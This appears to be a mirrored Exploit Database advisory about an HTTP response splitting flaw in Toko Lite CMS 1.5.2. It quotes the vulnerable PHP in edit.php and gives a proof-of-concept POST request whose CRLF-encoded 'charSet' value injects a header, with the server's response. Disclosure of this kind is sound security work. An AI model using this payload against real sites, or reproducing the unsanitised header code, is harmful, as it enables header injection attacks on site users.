Toko Lite CMS 1.5.2 – ‘edit.php’ HTTP Response Splitting

• Exploit Database
• 10 阅读

• 作者： LiquidWorm
  日期： 2011-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17859/

• Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability
  
  
  Vendor: Toko
  Product web page: http://toko-contenteditor.pageil.net
  Affected version: 1.5.2
  
  Summary: Toko Web Content Editor cms is a compact, multi language, open
  source web editor and content management system (CMS). It is advanced
  easy to use yet fully featured program that can be integrated with any
  existing site. It takes 2 minuets to install even for non technical users. 
  
  Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly
  sanitised before being returned to the user. This can be exploited to insert
  arbitrary HTTP headers, which are included in a response sent to the user.
  
  
  ====================================================================
  /edit.php:
  --------------------------------------------------------------------
  
   3: $charSet = "iso-8859-1";
   4: $dir = "ltr";
   5:
   6: if ( isset( $_POST[ "charSet" ] ) )
   7: {
   8: $charSet = $_POST[ "charSet" ];
   9:
  10: if ( $charSet == "windows-1255" )
  11: {
  12:$dir = "rtl";
  13: }
  14: }
  15:
  16: header( "Content-Type: text/html; charset=" . $charSet );
  
  ====================================================================
  
  
  Tested on: Microsoft Windows XP Professional SP3 (EN)
   Apache 2.2.14 (Win32)
   PHP 5.3.1
   MySQL 5.1.41
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2011-5048
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
  
  CWE ID: 113
  
  
  22.03.2011
  
  
  ------------
  
  
  POST /tokolite1.5.2/edit.php HTTP/1.1
  Content-Length: 55
  Content-Type: application/x-www-form-urlencoded
  Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
  
  --
  
  HTTP/1.1 302 Found
  Date: Tue, 22 Mar 2011 03:57:30 GMT
  Server: Apache/2.2.14 (Win32)
  X-Powered-By: PHP/5.3.1
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Location: Login.php
  Content-Length: 0
  Keep-Alive: timeout=5, max=64
  Connection: Keep-Alive
  Content-Type: text/html; charset=
  ZSL-Custom-Header: love_injection